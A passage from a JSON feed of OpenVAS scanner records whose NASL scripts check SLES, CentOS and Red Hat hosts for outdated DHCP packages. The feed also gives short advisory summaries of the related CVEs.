script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.1rc13~28.24\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:10", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp\n dhcp-client\n dhcp-devel\n dhcp-relay\n dhcp-server\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "SLES10: Security update for DHCP", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0062"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231065863", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065863", "sourceData": "#\n#VID slesp2-dhcp-5975\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for DHCP\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp\n dhcp-client\n dhcp-devel\n dhcp-relay\n dhcp-server\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65863\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2007-0062\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for DHCP\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.3~23.52\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.3~23.52\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.3~23.52\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.3~23.52\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.3~23.52\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:49", "description": "The remote host is missing updates to dhcp announced in\nadvisory CESA-2009:1154.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "CentOS Security Advisory CESA-2009:1154 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1893", "CVE-2009-0692"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064449", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064449", "sourceData": "#CESA-2009:1154 64449 2\n# $Id: ovcesa2009_1154.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1154 (dhcp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1154\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1154\nhttps://rhn.redhat.com/errata/RHSA-2009-1154.html\";\ntag_summary = \"The remote host is missing updates to dhcp announced in\nadvisory CESA-2009:1154.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64449\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1893\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Security Advisory CESA-2009:1154 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~3.0.1~10.2_EL3\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.1~10.2_EL3\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.1~10.2_EL3\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:55:37", "description": "Check for the Version of dhclient", "cvss3": {}, "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for dhclient CESA-2009:1154 centos3 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1893", "CVE-2009-0692"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:880710", "href": "http://plugins.openvas.org/nasl.php?oid=880710", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for dhclient CESA-2009:1154 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\n individual devices on an IP network to get their own network configuration\n information, including an IP address, a subnet mask, and a broadcast\n address.\n\n The Mandriva Linux Engineering Team discovered a stack-based buffer\n overflow flaw in the ISC DHCP client. If the DHCP client were to receive a\n malicious DHCP response, it could crash or execute arbitrary code with the\n permissions of the client (root). (CVE-2009-0692)\n \n An insecure temporary file use flaw was discovered in the DHCP daemon's\n init script (&quot;/etc/init.d/dhcpd&quot;). A local attacker could use this flaw to\n overwrite an arbitrary file with the output of the &quot;dhcpd -t&quot; command via\n a symbolic link attack, if a system administrator executed the DHCP init\n script with the &quot;configtest&quot;, &quot;restart&quot;, or &quot;reload&quot; option.\n (CVE-2009-1893)\n \n Users of DHCP should upgrade to these updated packages, which contain\n backported patches to correct these issues.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"dhclient on CentOS 3\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-July/016034.html\");\n script_id(880710);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2009:1154\");\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1893\");\n script_name(\"CentOS Update for dhclient CESA-2009:1154 centos3 i386\");\n\n script_summary(\"Check for the Version of dhclient\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~3.0.1~10.2_EL3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.1~10.2_EL3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.1~10.2_EL3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:00", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1154.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to receive a\nmalicious DHCP response, it could crash or execute arbitrary code with the\npermissions of the client (root). (CVE-2009-0692)\n\nAn insecure temporary file use flaw was discovered in the DHCP daemon's\ninit script (/etc/init.d/dhcpd). A local attacker could use this flaw to\noverwrite an arbitrary file with the output of the dhcpd -t command via\na symbolic link attack, if a system administrator executed the DHCP init\nscript with the configtest, restart, or reload option.\n(CVE-2009-1893)\n\nUsers of DHCP should upgrade to these updated packages, which contain\nbackported patches to correct these issues.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1154", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1893", "CVE-2009-0692"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:64387", "href": "http://plugins.openvas.org/nasl.php?oid=64387", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1154.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1154 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1154.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to receive a\nmalicious DHCP response, it could crash or execute arbitrary code with the\npermissions of the client (root). (CVE-2009-0692)\n\nAn insecure temporary file use flaw was discovered in the DHCP daemon's\ninit script (/etc/init.d/dhcpd). A local attacker could use this flaw to\noverwrite an arbitrary file with the output of the dhcpd -t command via\na symbolic link attack, if a system administrator executed the DHCP init\nscript with the configtest, restart, or reload option.\n(CVE-2009-1893)\n\nUsers of DHCP should upgrade to these updated packages, which contain\nbackported patches to correct these issues.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(64387);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1893\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1154\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1154.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~3.0.1~10.2_EL3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.1~10.2_EL3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~3.0.1~10.2_EL3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.1~10.2_EL3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:57:17", "description": "The remote host is missing updates to dhcp announced in\nadvisory CESA-2009:1154.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "CentOS Security Advisory CESA-2009:1154 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1893", "CVE-2009-0692"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:64449", "href": "http://plugins.openvas.org/nasl.php?oid=64449", "sourceData": "#CESA-2009:1154 64449 2\n# $Id: ovcesa2009_1154.nasl 6650 2017-07-10 11:43:12Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1154 (dhcp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1154\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1154\nhttps://rhn.redhat.com/errata/RHSA-2009-1154.html\";\ntag_summary = \"The remote host is missing updates to dhcp announced in\nadvisory CESA-2009:1154.\";\n\n\n\nif(description)\n{\n script_id(64449);\n script_version(\"$Revision: 6650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:43:12 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1893\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Security Advisory CESA-2009:1154 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~3.0.1~10.2_EL3\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.1~10.2_EL3\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.1~10.2_EL3\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:17", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1154.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to receive a\nmalicious DHCP response, it could crash or execute arbitrary code with the\npermissions of the client (root). (CVE-2009-0692)\n\nAn insecure temporary file use flaw was discovered in the DHCP daemon's\ninit script (/etc/init.d/dhcpd). A local attacker could use this flaw to\noverwrite an arbitrary file with the output of the dhcpd -t command via\na symbolic link attack, if a system administrator executed the DHCP init\nscript with the configtest, restart, or reload option.\n(CVE-2009-1893)\n\nUsers of DHCP should upgrade to these updated packages, which contain\nbackported patches to correct these issues.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1154", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1893", "CVE-2009-0692"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064387", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064387", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1154.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1154 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1154.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to receive a\nmalicious DHCP response, it could crash or execute arbitrary code with the\npermissions of the client (root). (CVE-2009-0692)\n\nAn insecure temporary file use flaw was discovered in the DHCP daemon's\ninit script (/etc/init.d/dhcpd). A local attacker could use this flaw to\noverwrite an arbitrary file with the output of the dhcpd -t command via\na symbolic link attack, if a system administrator executed the DHCP init\nscript with the configtest, restart, or reload option.\n(CVE-2009-1893)\n\nUsers of DHCP should upgrade to these updated packages, which contain\nbackported patches to correct these issues.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64387\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1893\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1154\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1154.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~3.0.1~10.2_EL3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.1~10.2_EL3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~3.0.1~10.2_EL3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.1~10.2_EL3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:48", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for dhclient CESA-2009:1154 centos3 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1893", "CVE-2009-0692"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310880710", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880710", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for dhclient CESA-2009:1154 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY 